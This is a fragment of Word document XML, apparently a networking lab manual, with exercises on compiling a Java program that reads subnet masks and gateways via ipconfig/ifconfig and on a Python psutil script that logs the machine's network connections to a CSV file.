      </w:r>
    </w:p>
    <w:p w14:paraId="390836C3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="3001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B29B793" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="252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A7448FC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A16F47">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1740" w:right="720" w:bottom="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20C96F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="2520" w:right="4861" w:hanging="48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}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(SocketException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{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC71A8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200F4B4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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9B8597C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04DB772" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5083829B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Compiling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Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60364741" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D586560" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335E8C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 Java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262F9FB1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DFFC7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101A2ACC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NetworkDetails.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E87BBF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2FE02B99" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Run the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F564EC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722D917D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NetworkDetails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59336DDB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250A57BB" w14:textId="77777777" w:rsidR="00A16F47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1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Linux/Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D46D5D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="287446C1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="508" w:lineRule="auto"/>
        <w:ind w:right="7925"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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Linux,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use: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig -a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCB15E9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="20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addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D143D2B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0C7B9D4D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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On Windows, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E3E0E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAF89EF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ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B7091" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732A1CE0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="1189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subnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>masks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and gateways using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2B20A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4994FC6E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java.io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4D6C8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="224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NetworkConfig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15D0BA29" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="2040" w:right="4068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 try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038261FB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="783" w:firstLine="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Process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Runtime.getRuntime().exec("ipconfig");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// Change to "ifconfig" for Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF59EAB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BufferedReader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reader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BufferedReader(new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>InputStreamReader(process.getInputStream()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D4E0B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="252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line;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD70BE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="3001" w:right="2461" w:hanging="481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((line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reader.readLine())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null)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 if (line.contains("Subnet Mask") ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739B25ED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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line.contains("Gateway"))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220AED82" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="3481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System.out.println(line.trim());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18466A2C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="3001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063DA92" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="252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1C502E7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="252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(IOException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{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D5F64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2114263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2CBF9B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBF8FDF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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5FF53E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="268"/>
        <w:ind w:left="1079" w:hanging="359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before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F418792" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFAEC05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283D3896" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB091E2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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(Windows,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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MacOS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D95834" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="9"/>
        <w:ind w:right="408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ipconfig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ifconfig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addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04199936" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651769AF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4E3E39D6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>◻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retrieves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default gateways from system network settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443DA9B9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A4F607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outgoing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using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F1986" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>psutil</w:t>
      </w:r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analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02FF40" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2006FE5D" w14:textId="77777777" w:rsidR="00A16F47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4758ED88" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="399D59A4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360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 that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incoming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and outgoing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6484BD3F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>psutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="20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saves 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analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535CFD77" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="275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3174A76E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634801B3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5C76089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0" w:line="279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psutil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library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monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37347D8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71" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux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Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C02A0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z w:val="24"/>
        </w:rPr>
        <w:t>Nano,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etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19897E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BC61BE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69FE8DFD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659A0630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Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC5320" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653DDDD8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1174A4E7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="10"/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psutil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installed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E6E7F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5CE0F8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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F4A76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46484577" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9DD3B3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACF6255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-c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"import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psutil;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print('psutil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installed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successfully')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC045C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F402113" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="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0A41C613" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1858773C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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network_logger.py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connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2F258" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177E0A0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF13EFA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="7731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psutil import time import csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1809E965" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="1560" w:right="2222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log_connections(log_file="network_connections.csv"): with open(log_file, mode='w', newline='') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B82BC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writer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csv.writer(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3453C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="783" w:firstLine="960"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>writer.writerow(["Timestamp",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"PID",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"Local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Address",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"Remote Address", "Status", "Process Name"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE3C799" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306CDFEC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True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD72212" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="3001" w:right="1849" w:hanging="481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conn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psutil.net_connections(kind='inet'): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6742F55D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="783" w:firstLine="2400"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>laddr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f"{conn.laddr.ip}:{conn.laddr.port}"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if conn.laddr else "N/A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECBCF0C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="783" w:firstLine="2400"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>raddr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f"{conn.raddr.ip}:{conn.raddr.port}"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if conn.raddr else "N/A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2C62B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact"/>
        <w:ind w:left="3481"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>process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psutil.Process(conn.pid).name()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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>conn.pid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20092C0D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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"N/A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEBACB1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CBE18" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="1080" w:firstLine="240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writer.writerow([time.strftime("%Y-%m-%d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%H:%M:%S"), conn.pid, laddr, raddr, conn.status, process])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125769C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="3481" w:right="783" w:hanging="480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(psutil.NoSuchProcess,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 xml:space="preserve">psutil.AccessDenied): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55441AFC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>time.sleep(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="50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every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seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC06FF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E352920" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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pacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787764D9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log_connections()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764C9D4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109F7A33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511FA223" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
